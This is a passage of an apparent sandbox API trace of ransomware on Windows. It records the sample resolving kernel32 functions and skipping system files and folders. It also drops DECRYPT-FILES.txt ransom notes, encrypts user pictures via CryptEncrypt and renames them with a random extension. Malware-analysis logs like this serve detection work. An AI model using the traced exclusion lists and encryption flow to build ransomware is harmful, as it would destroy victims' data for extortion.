lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0086.090] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0086.090] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0086.090] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0086.090] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0086.090] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0086.090] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0086.090] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0086.090] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0086.090] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0086.090] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0086.090] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0086.090] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0086.090] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0086.090] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0086.090] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0086.090] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0086.090] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0086.090] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0086.090] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0086.090] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0086.090] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0086.090] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0086.090] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0086.090] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0086.090] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0086.090] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0086.090] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0086.090] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0086.090] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0086.090] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0086.090] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0086.090] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0086.090] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0086.091] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0086.091] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0086.091] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0086.091] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0086.091] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0086.091] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0086.091] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0086.091] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0086.091] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0086.091] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0086.091] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0086.091] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0086.091] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0086.091] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0086.091] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0086.091] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0086.091] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0086.091] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0086.091] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0086.091] lstrcpyW (in: lpString1=0xfb0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0086.091] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\IQYZN 7s2p1.png") returned 54 [0086.091] wsprintfW (in: param_1=0x3f2e120, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\IQYZN 7s2p1.png.S2RnU") returned 60 [0086.091] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\IQYZN 7s2p1.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\iqyzn 7s2p1.png"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\IQYZN 7s2p1.png.S2RnU" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\iqyzn 7s2p1.png.s2rnu"), dwFlags=0x0) returned 1 [0086.092] VirtualFree (lpAddress=0xfa0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.092] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.092] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.093] FindNextFileW (in: hFindFile=0x5f8b98, lpFindFileData=0x3f2f150 | out: lpFindFileData=0x3f2f150*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae5f45e0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xaf782820, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaf782820, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="jkbimi8.tmp", cAlternateFileName="")) returned 1 [0086.093] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="DECRYPT-FILES.txt") returned 1 [0086.093] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="autorun.inf") returned 1 [0086.093] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="boot.ini") returned 1 [0086.093] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="desktop.ini") returned 1 [0086.093] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat") returned -1 [0086.093] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="iconcache.db") returned 1 [0086.093] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="bootsect.bak") returned 1 [0086.093] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat.log") returned -1 [0086.093] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="thumbs.db") returned -1 [0086.093] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="Bootfont.bin") returned 1 [0086.093] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0086.093] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0086.093] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0086.093] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0086.093] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0086.093] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned 39 [0086.093] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0086.093] lstrcpyW (in: lpString1=0x3f2e920, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" [0086.093] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\", lpString2="jkbimi8.tmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\jkbimi8.tmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\jkbimi8.tmp" [0086.093] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0086.094] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\jkbimi8.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\jkbimi8.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0086.094] CloseHandle (hObject=0x0) returned 0 [0086.094] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.094] FindNextFileW (in: hFindFile=0x5f8b98, lpFindFileData=0x3f2f150 | out: lpFindFileData=0x3f2f150*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x268ba1a0, ftCreationTime.dwHighDateTime=0x1d4ca70, ftLastAccessTime.dwLowDateTime=0x9fa2c690, ftLastAccessTime.dwHighDateTime=0x1d4d0b5, ftLastWriteTime.dwLowDateTime=0x9fa2c690, ftLastWriteTime.dwHighDateTime=0x1d4d0b5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="nTwgr", cAlternateFileName="")) returned 1 [0086.094] lstrcmpW (lpString1="nTwgr", lpString2=".") returned 1 [0086.094] lstrcmpW (lpString1="nTwgr", lpString2="..") returned 1 [0086.094] lstrcatW (in: lpString1="nTwgr", lpString2="\\" | out: lpString1="nTwgr\\") returned="nTwgr\\" [0086.094] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\", lpString2="nTwgr\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\" [0086.094] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\", lpSrch="\\Program Files") returned 0x0 [0086.094] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\", lpSrch=":\\Windows") returned 0x0 [0086.094] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\", lpSrch="\\Games\\") returned 0x0 [0086.094] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\", lpSrch="\\Tor Browser\\") returned 0x0 [0086.094] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\", lpSrch="\\ProgramData\\") returned 0x0 [0086.094] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0086.094] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0086.094] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0086.094] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\", lpSrch="\\All Users") returned 0x0 [0086.094] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\", lpSrch="\\IETldCache\\") returned 0x0 [0086.094] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\", lpSrch="\\Local Settings\\") returned 0x0 [0086.095] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\", lpSrch="\\AppData\\Local") returned 0x0 [0086.095] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\", lpSrch="AhnLab") returned 0x0 [0086.095] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0086.095] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\") returned 45 [0086.095] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0086.095] wsprintfW (in: param_1=0x3f2e6b4, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\\\jkbimi8.tmp") returned 57 [0086.095] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\\\jkbimi8.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\ntwgr\\jkbimi8.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x410 [0086.095] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\") returned 45 [0086.095] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0086.095] wsprintfW (in: param_1=0x3f2e6b4, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\\\DECRYPT-FILES.txt") returned 63 [0086.095] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\ntwgr\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x414 [0086.096] WriteFile (in: hFile=0x414, lpBuffer=0xf70000*, nNumberOfBytesToWrite=0x23fc, lpNumberOfBytesWritten=0x3f2e6b0, lpOverlapped=0x0 | out: lpBuffer=0xf70000*, lpNumberOfBytesWritten=0x3f2e6b0*=0x23fc, lpOverlapped=0x0) returned 1 [0086.097] CloseHandle (hObject=0x414) returned 1 [0086.097] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\") returned 45 [0086.097] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\", lpString2="*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\*" [0086.097] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\*", lpFindFileData=0x3f2eed4 | out: lpFindFileData=0x3f2eed4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x268ba1a0, ftCreationTime.dwHighDateTime=0x1d4ca70, ftLastAccessTime.dwLowDateTime=0xaf840f00, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaf840f00, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5f8c98 [0086.097] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0086.097] FindNextFileW (in: hFindFile=0x5f8c98, lpFindFileData=0x3f2eed4 | out: lpFindFileData=0x3f2eed4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x268ba1a0, ftCreationTime.dwHighDateTime=0x1d4ca70, ftLastAccessTime.dwLowDateTime=0xaf840f00, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaf840f00, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0086.097] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0086.097] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0086.097] FindNextFileW (in: hFindFile=0x5f8c98, lpFindFileData=0x3f2eed4 | out: lpFindFileData=0x3f2eed4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x86d52360, ftCreationTime.dwHighDateTime=0x1d4c69c, ftLastAccessTime.dwLowDateTime=0x21347670, ftLastAccessTime.dwHighDateTime=0x1d4cc85, ftLastWriteTime.dwLowDateTime=0x21347670, ftLastWriteTime.dwHighDateTime=0x1d4cc85, nFileSizeHigh=0x0, nFileSizeLow=0xbd4e, dwReserved0=0x0, dwReserved1=0x0, cFileName="5H FrCvTzwDbhSv2_.jpg", cAlternateFileName="5HFRCV~1.JPG")) returned 1 [0086.097] lstrcmpiW (lpString1="5H FrCvTzwDbhSv2_.jpg", lpString2="DECRYPT-FILES.txt") returned -1 [0086.097] lstrcmpiW (lpString1="5H FrCvTzwDbhSv2_.jpg", lpString2="autorun.inf") returned -1 [0086.097] lstrcmpiW (lpString1="5H FrCvTzwDbhSv2_.jpg", lpString2="boot.ini") returned -1 [0086.097] lstrcmpiW (lpString1="5H FrCvTzwDbhSv2_.jpg", lpString2="desktop.ini") returned -1 [0086.097] lstrcmpiW (lpString1="5H FrCvTzwDbhSv2_.jpg", lpString2="ntuser.dat") returned -1 [0086.097] lstrcmpiW (lpString1="5H FrCvTzwDbhSv2_.jpg", lpString2="iconcache.db") returned -1 [0086.097] lstrcmpiW (lpString1="5H FrCvTzwDbhSv2_.jpg", lpString2="bootsect.bak") returned -1 [0086.097] lstrcmpiW (lpString1="5H FrCvTzwDbhSv2_.jpg", lpString2="ntuser.dat.log") returned -1 [0086.097] lstrcmpiW (lpString1="5H FrCvTzwDbhSv2_.jpg", lpString2="thumbs.db") returned -1 [0086.097] lstrcmpiW (lpString1="5H FrCvTzwDbhSv2_.jpg", lpString2="Bootfont.bin") returned -1 [0086.097] lstrlenW (lpString="5H FrCvTzwDbhSv2_.jpg") returned 21 [0086.097] lstrcmpiW (lpString1="jpg", lpString2="lnk") returned -1 [0086.097] lstrcmpiW (lpString1="jpg", lpString2="exe") returned 1 [0086.097] lstrcmpiW (lpString1="jpg", lpString2="sys") returned -1 [0086.097] lstrcmpiW (lpString1="jpg", lpString2="dll") returned 1 [0086.097] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\") returned 45 [0086.097] lstrlenW (lpString="5H FrCvTzwDbhSv2_.jpg") returned 21 [0086.097] lstrcpyW (in: lpString1=0x3f2e6a4, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\" [0086.097] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\", lpString2="5H FrCvTzwDbhSv2_.jpg" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\5H FrCvTzwDbhSv2_.jpg") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\5H FrCvTzwDbhSv2_.jpg" [0086.097] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0086.098] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\5H FrCvTzwDbhSv2_.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\ntwgr\\5h frcvtzwdbhsv2_.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x428 [0086.098] GetFileSizeEx (in: hFile=0x428, lpFileSize=0x3f2de70 | out: lpFileSize=0x3f2de70*=48462) returned 1 [0086.098] CreateFileMappingW (hFile=0x428, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x42c [0086.098] MapViewOfFile (hFileMappingObject=0x42c, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xfa0000 [0086.098] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xf90000 | out: pbBuffer=0xf90000) returned 1 [0086.098] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xf90020 | out: pbBuffer=0xf90020) returned 1 [0086.098] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0086.099] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfb0000*, pdwDataLen=0x3f2ddd8*=0x28, dwBufLen=0x100 | out: pbData=0xfb0000*, pdwDataLen=0x3f2ddd8*=0x100) returned 1 [0086.099] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0086.100] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.100] UnmapViewOfFile (lpBaseAddress=0xfa0000) returned 1 [0086.101] CloseHandle (hObject=0x42c) returned 1 [0086.101] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.101] WriteFile (in: hFile=0x428, lpBuffer=0xfb0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2ddf8, lpOverlapped=0x0 | out: lpBuffer=0xfb0000*, lpNumberOfBytesWritten=0x3f2ddf8*=0x108, lpOverlapped=0x0) returned 1 [0086.102] CloseHandle (hObject=0x0) returned 0 [0086.102] CloseHandle (hObject=0x428) returned 1 [0086.102] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.102] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.102] GetTickCount () returned 0x114dfa6 [0086.102] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0086.103] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0086.103] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0xfa0000 [0086.103] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0086.103] lstrlenA (lpString="kernel32.dll") returned 12 [0086.103] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0086.103] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0086.103] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0086.103] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0086.103] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0086.103] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0086.103] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0086.103] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0086.103] lstrlenA (lpString="ADDATOMA") returned 8 [0086.104] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0086.104] lstrlenA (lpString="ADDATOMW") returned 8 [0086.104] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0086.104] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0086.104] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0086.104] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0086.104] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0086.104] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0086.104] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0086.104] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0086.104] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0086.104] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0086.104] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0086.104] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0086.104] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0086.104] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0086.104] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0086.104] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0086.104] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0086.104] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0086.104] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0086.104] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0086.104] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0086.104] 